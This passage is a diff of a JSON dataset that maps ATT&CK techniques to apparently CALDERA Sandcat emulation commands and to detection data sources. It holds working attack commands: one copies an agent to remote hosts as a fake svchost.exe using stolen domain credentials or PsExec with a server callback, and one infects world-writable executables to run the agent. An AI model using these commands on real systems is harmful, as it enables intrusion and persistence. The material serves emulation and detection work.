"permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1570", + "command_list": [ + "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n $location = \"#{location}\";\n $exe = \"#{exe_name}\";\n Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n", + "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n", + "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n", + "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n" + ], + "commands": [ + { + "command": "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n $location = \"#{location}\";\n $exe = \"#{exe_name}\";\n Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n", + "source": "data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml", + "name": "Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP" + }, + { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n", + "source": "data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml", + "name": "Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP" + }, + { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n", + "source": "data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml", + "name": "Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP" + }, + { + "command": "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n", + "source": "data/abilities/lateral-movement/620b674a-7655-436c-b645-bc3e8ea51abd.yml", + "name": "Copy Sandcat file using PsExec on CMD" + } + ], + "parsed_datasets": [ + { + "id": "4908fdc4-74fc-4d7c-8935-26d11ad26a8d", + "name": "Copy 54ndc47 (WinRM and SCP)", + "description": "Copy 54ndc47 to remote host (powershell 5 or newer only) or SCP", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1570", + "name": "Lateral Tool Transfer" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n $location = \"#{location}\";\n $exe = \"#{exe_name}\";\n Copy-Item $location -Destination \"C:\\Users\\Public\\svchost.exe\" -ToSession $session;\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n", + "cleanup": "$job = Start-Job -ScriptBlock {\n $username = \"#{domain.user.name}\";\n $password = \"#{domain.user.password}\";\n $secstr = New-Object -TypeName System.Security.SecureString;\n $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n $session = New-PSSession -ComputerName \"#{remote.host.name}\" -Credential $cred;\n Invoke-Command -Session $session -Command {Remove-Item \"C:\\Users\\Public\\svchost.exe\" -force};\n Start-Sleep -s 5;\n Remove-PSSession -Session $session;\n};\nReceive-Job -Job $job -Wait;\n", + "payloads": [ + "sandcat.go-windows" + ] + } + }, + "darwin": { + "sh": { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go\n", + "cleanup": "ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'rm -f sandcat.go'\n", + "payloads": [ + "sandcat.go-darwin" + ] + } + }, + "linux": { + "sh": { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go\n", + "cleanup": "ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go'\n", + "payloads": [ + "sandcat.go-linux" + ] + } + } + }, + "singleton": true + }, + { + "id": "620b674a-7655-436c-b645-bc3e8ea51abd", + "description": "Copy Sandcat file using PsExec on CMD", + "name": "Copy Sandcat File using PsExec on CMD", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1570", + "name": "Lateral Tool Transfer" + }, + "platforms": { + "windows": { + "cmd": { + "cleanup": "del /f sandcat.go-windows && del /f \\\\#{remote.host.name}\\Users\\Public\\sandcat.go-windows.exe", + "command": "net /y use \\\\#{remote.host.name} & copy /y sandcat.go-windows\n\\\\#{remote.host.name}\\Users\\Public & #{psexec.path} -accepteula \\\\#{remote.host.name}\ncmd /c start C:\\Users\\Public\\sandcat.go-windows -server #{server} -v\n", + "payloads": [ + "sandcat.go-windows" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + null, + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1574.010", + "command_list": [ + "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n" + ], + "commands": [ + { + "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + "source": "data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml", + "name": "Locate and infect files with weak but executable perms" + }, + { + "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + "source": "data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml", + "name": "Locate and infect files with weak but executable perms" + } + ], + "parsed_datasets": [ + { + "id": "10681f2f-be03-44af-858d-f2b0812df185", + "name": "Weak executable files", + "description": "Locate and infect files with weak but executable perms", + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1574.010", + "name": "Hijack Execution Flow: Services File Permissions Weakness" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + "payloads": [ + "sandcat.go" + ] + } + }, + "linux": { + "sh": { + "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n", + "payloads": [ + "sandcat.go" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + 